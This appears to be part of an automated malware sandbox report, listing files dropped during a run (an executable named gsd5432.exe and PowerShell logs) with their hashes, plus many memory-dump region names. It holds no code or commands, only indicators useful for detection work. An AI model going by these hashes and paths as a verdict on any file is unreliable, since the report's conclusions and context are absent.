                                              MITRE ATT&CK Enterprise v6

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe

                                                Filesize

                                                5.0MB

                                                MD5

                                                c7ad8aff4b9bcaaf8362bc46dbb335bd

                                                SHA1

                                                6da9bd46beba784cde7bce3d73963567c9efb9b0

                                                SHA256

                                                1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84

                                                SHA512

                                                e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3

                                              • C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe

                                                Filesize

                                                5.0MB

                                                MD5

                                                c7ad8aff4b9bcaaf8362bc46dbb335bd

                                                SHA1

                                                6da9bd46beba784cde7bce3d73963567c9efb9b0

                                                SHA256

                                                1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84

                                                SHA512

                                                e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                3KB

                                                MD5

                                                8592ba100a78835a6b94d5949e13dfc1

                                                SHA1

                                                63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                SHA256

                                                fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                SHA512

                                                87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                1KB

                                                MD5

                                                f340953e5f0581b3d013f11aec731f56

                                                SHA1

                                                981e609061eac5c00a087e38103782b6af9d587b

                                                SHA256

                                                6278a8fca5d5f830695853bf1009f2d673e5f639cbe90f96f267e77c268e528d

                                                SHA512

                                                3cee11b56acffd14d6438f33ece3bc730731d75772e6cd6dde4b445d8a631bdd04777dca6b90aa5986576b1a236fe20b8bd7aeb2cb0a7c3c3427729bb0475852

                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                3KB

                                                MD5

                                                5d574dc518025fad52b7886c1bff0e13

                                                SHA1

                                                68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

                                                SHA256

                                                755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

                                                SHA512

                                                21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                1KB

                                                MD5

                                                e2d46bffd1d9300639cac360fac02cb4

                                                SHA1

                                                fd2b4813c8ab610294b6759192ca05bad5bb8958

                                                SHA256

                                                94ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3

                                                SHA512

                                                54b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535

                                              • memory/68-420-0x0000000000000000-mapping.dmp

                                              • memory/428-412-0x0000000000000000-mapping.dmp

                                              • memory/568-423-0x0000000000000000-mapping.dmp

                                              • memory/644-418-0x0000000000000000-mapping.dmp

                                              • memory/732-179-0x0000000000000000-mapping.dmp

                                              • memory/760-407-0x0000000000000000-mapping.dmp

                                              • memory/868-419-0x0000000000000000-mapping.dmp

                                              • memory/1192-435-0x0000000000000000-mapping.dmp

                                              • memory/1212-430-0x0000000000000000-mapping.dmp

                                              • memory/1296-239-0x0000000000000000-mapping.dmp

                                              • memory/1316-237-0x0000000000000000-mapping.dmp

                                              • memory/1484-240-0x0000000000000000-mapping.dmp

                                              • memory/1552-238-0x0000000000000000-mapping.dmp

                                              • memory/1832-255-0x0000000000000000-mapping.dmp

                                              • memory/1916-184-0x0000000000000000-mapping.dmp

                                              • memory/1940-168-0x0000000000000000-mapping.dmp

                                              • memory/1948-170-0x0000000000000000-mapping.dmp

                                              • memory/1952-171-0x0000000000000000-mapping.dmp

                                              • memory/2100-433-0x0000000000000000-mapping.dmp

                                              • memory/2108-403-0x0000000000000000-mapping.dmp

                                              • memory/2248-429-0x0000000000000000-mapping.dmp

                                              • memory/2344-422-0x0000000000000000-mapping.dmp

                                              • memory/2356-252-0x0000000000000000-mapping.dmp

                                              • memory/2516-248-0x0000000000000000-mapping.dmp

                                              • memory/2680-438-0x000000001B650000-0x000000001B662000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/2680-415-0x0000000001800000-0x0000000001806000-memory.dmp

                                                Filesize

                                                24KB

                                              • memory/2680-250-0x0000000000000000-mapping.dmp

                                              • memory/2904-180-0x0000000000000000-mapping.dmp

                                              • memory/3032-173-0x0000000000000000-mapping.dmp

                                              • memory/3108-181-0x0000000000000000-mapping.dmp

                                              • memory/3128-409-0x0000000000000000-mapping.dmp

                                              • memory/3140-183-0x0000000000000000-mapping.dmp

                                              • memory/3188-411-0x0000000000000000-mapping.dmp

                                              • memory/3244-402-0x0000000000000000-mapping.dmp

                                              • memory/3340-421-0x0000000000000000-mapping.dmp

                                              • memory/3468-167-0x0000000000000000-mapping.dmp

                                              • memory/3472-404-0x0000000000000000-mapping.dmp

                                              • memory/3596-169-0x0000000000000000-mapping.dmp

                                              • memory/3608-175-0x0000000000000000-mapping.dmp

                                              • memory/3612-172-0x0000000000000000-mapping.dmp

                                              • memory/3688-174-0x0000000000000000-mapping.dmp

                                              • memory/3704-249-0x0000000000000000-mapping.dmp

                                              • memory/4052-166-0x0000000000000000-mapping.dmp

                                              • memory/4060-406-0x0000000000000000-mapping.dmp

                                              • memory/4120-127-0x0000000000A50000-0x0000000000F5E000-memory.dmp

                                                Filesize

                                                5.1MB

                                              • memory/4216-178-0x0000000000000000-mapping.dmp

                                              • memory/4248-405-0x0000000000000000-mapping.dmp

                                              • memory/4304-256-0x0000000000000000-mapping.dmp

                                              • memory/4308-253-0x0000000000000000-mapping.dmp

                                              • memory/4436-408-0x0000000000000000-mapping.dmp

                                              • memory/4508-413-0x0000000000000000-mapping.dmp

                                              • memory/4512-224-0x0000000000000000-mapping.dmp

                                              • memory/4520-434-0x0000000000000000-mapping.dmp

                                              • memory/4540-453-0x0000020D07060000-0x0000020D07080000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/4540-444-0x0000000140000000-0x0000000140809000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/4540-441-0x0000000140000000-0x0000000140809000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/4540-440-0x0000000140000000-0x0000000140809000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/4540-448-0x0000020D06AD0000-0x0000020D06AF0000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/4540-451-0x0000000140000000-0x0000000140809000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/4540-452-0x0000020D07060000-0x0000020D07080000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/4540-442-0x0000000140000000-0x0000000140809000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/4540-443-0x0000020D06A60000-0x0000020D06A80000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/4544-449-0x00000198A6310000-0x00000198A6316000-memory.dmp

                                                Filesize

                                                24KB

                                              • memory/4544-428-0x00000198BEDD0000-0x00000198BEEC8000-memory.dmp

                                                Filesize

                                                992KB

                                              • memory/4544-439-0x00000198A5A00000-0x00000198A5AF7000-memory.dmp

                                                Filesize

                                                988KB

                                              • memory/4544-447-0x00000198A63A0000-0x00000198A63C0000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/4548-223-0x0000000000000000-mapping.dmp

                                              • memory/4632-275-0x0000012EDD5A0000-0x0000012EDD5BC000-memory.dmp

                                                Filesize

                                                112KB

                                              • memory/4632-315-0x0000012EDD5C0000-0x0000012EDD5CA000-memory.dmp

                                                Filesize

                                                40KB

                                              • memory/4632-257-0x0000000000000000-mapping.dmp

                                              • memory/4632-281-0x0000012EDD780000-0x0000012EDD839000-memory.dmp

                                                Filesize

                                                740KB

                                              • memory/4648-436-0x0000000000000000-mapping.dmp

                                              • memory/4696-437-0x0000000000000000-mapping.dmp

                                              • memory/4720-236-0x0000000000000000-mapping.dmp

                                              • memory/4804-432-0x0000000000000000-mapping.dmp

                                              • memory/4812-138-0x00000247BA650000-0x00000247BA6C6000-memory.dmp

                                                Filesize

                                                472KB

                                              • memory/4812-134-0x00000247B9270000-0x00000247B9292000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/4812-128-0x0000000000000000-mapping.dmp

                                              • memory/4872-410-0x0000000000000000-mapping.dmp

                                              • memory/4880-176-0x0000000000000000-mapping.dmp

                                              • memory/4892-182-0x0000000000000000-mapping.dmp

                                              • memory/5032-177-0x0000000000000000-mapping.dmp

                                              • memory/5080-414-0x0000000000000000-mapping.dmp

                                              • memory/5084-416-0x0000000000000000-mapping.dmp

                                              • memory/5108-417-0x0000000000000000-mapping.dmp